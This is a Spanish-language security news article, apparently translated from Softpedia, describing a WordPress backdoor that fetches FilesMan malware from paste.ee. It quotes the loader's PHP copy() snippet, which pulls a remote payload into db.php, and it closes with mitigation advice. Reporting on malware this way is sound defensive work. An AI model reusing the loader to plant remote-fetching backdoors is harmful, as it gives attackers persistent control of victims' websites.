Backdoor como servicio de alojamiento para Filesman

Puerta trasera de un sitio web que a diferencia de otros hermanos de su familia no integra su código dentro de una página web pero lo carga desde un servicio de portapapeles en línea.

Las puertas traseras de sitios web son herramientas maliciosas especialmente diseñadas escondidas dentro del código de un sitio web y diseñadas para permitir que un atacante reinfecte el objetivo y conserve el control incluso después de que el sitio haya sido limpiado.

"El 71% de todos los objetivos comprometidos tenían una puerta trasera basada en PHP oculta dentro del sitio", dice el informe del experto. "La efectividad de estas puertas traseras proviene de su elusiveness a la mayoría de las tecnologías de escaneo de sitios web".

La mayoría de los programas maliciosos diseñados para sitios web y añadidos al código de una página web utilizan técnicas de ofuscación para evitar que los propietarios de sitios web descubran el verdadero propósito y el objetivo del código oculto.

Sin embargo, como se describe en la publicación de blog de Zanelato, la puerta trasera inusual que descubrió no intenta esconderse a la vista en las páginas del sitio web de destino como muchos de sus homólogos.

En su lugar, agrega un archivo PHP dentro de la estructura del sitio web que contiene el código de descarga de carga útil, que se puede encontrar en wp-content/themes/buildup/db.php.

La puerta trasera descarga su carga del servicio de pegado basado en web paste.ee

El código que figura a continuación descargará la puerta trasera, que luego tomará el malware diseñado para permitir que el atacante del sitio web vuelva a infectar el sitio web en una fecha posterior.

if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {

echo "Copy_success";

}else{

echo "Copy_failed";

} ?

Una vez descifrado, el contenido de la carga maliciosa descargada reveló que la puerta trasera "minimalista" es el malware FilesMan que permite a los actores de amenazas obtener acceso, modificar y reinfectar los sitios web en cualquier momento después de la infección.

Los sitios web pueden ser "respaldados" independientemente del servidor o CMS que estén utilizando, con la ayuda de vulnerabilidades creadas para versiones sin parche de Joomla, Wordpress y osCommerce, o mediante credenciales de autenticación robadas.

Mitigar los ataques de puerta trasera del sitio web es una cuestión de vigilar de cerca tus registros siempre buscando cosas que parecen fuera de lugar, como conexiones salientes a servidores desconocidos.

Semrush sigue a tu competencia


Fecha actualización el 2018-09-19. Fecha publicación el 2018-09-19. Categoria: backdoor Autor: Oscar olg Mapa del sitio Fuente: softpedia
backdoor